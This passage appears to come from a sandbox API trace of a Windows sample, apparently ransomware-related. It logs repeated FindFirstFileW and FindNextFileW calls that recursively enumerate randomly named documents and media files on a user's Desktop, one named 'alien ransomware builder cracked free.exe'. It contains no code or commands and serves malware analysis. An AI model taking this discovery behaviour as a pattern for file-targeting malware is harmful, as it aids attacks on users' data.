ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c346c0, ftCreationTime.dwHighDateTime=0x1d5c79c, ftLastAccessTime.dwLowDateTime=0xc13b08a0, ftLastAccessTime.dwHighDateTime=0x1d5d463, ftLastWriteTime.dwLowDateTime=0xc13b08a0, ftLastWriteTime.dwHighDateTime=0x1d5d463, nFileSizeHigh=0x0, nFileSizeLow=0x4b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif", cAlternateFileName="")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0063.273] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0063.273] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0063.273] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0063.273] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0063.273] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2942aad0, ftCreationTime.dwHighDateTime=0x1d5d5cb, ftLastAccessTime.dwLowDateTime=0x3520ea30, ftLastAccessTime.dwHighDateTime=0x1d5d358, ftLastWriteTime.dwLowDateTime=0x3520ea30, ftLastWriteTime.dwHighDateTime=0x1d5d358, nFileSizeHigh=0x0, nFileSizeLow=0x10253, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif", cAlternateFileName="J51YJL~1.GIF")) returned 1 [0063.309] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0063.309] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0063.309] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0063.309] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d8d490, ftCreationTime.dwHighDateTime=0x1d5cd75, ftLastAccessTime.dwLowDateTime=0x2c2b1a50, ftLastAccessTime.dwHighDateTime=0x1d5ccef, ftLastWriteTime.dwLowDateTime=0x2c2b1a50, ftLastWriteTime.dwHighDateTime=0x1d5ccef, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif", cAlternateFileName="MCQMPN~1.GIF")) returned 1 [0063.309] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0063.310] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0063.311] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 1 [0063.311] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0063.311] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0063.311] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0063.311] FindNextFileW (in: hFindFile=0x9bf260, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0063.311] FindClose (in: hFindFile=0x9bf260 | out: hFindFile=0x9bf260) returned 1 [0063.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.jpeg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed80 [0063.312] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.312] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0063.312] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0063.313] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0063.313] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0063.313] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0063.313] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0063.313] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0063.313] FindClose (in: hFindFile=0x9bed80 | out: hFindFile=0x9bed80) returned 1 [0063.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.jpeg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf2c0 [0063.314] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.314] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0063.314] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, 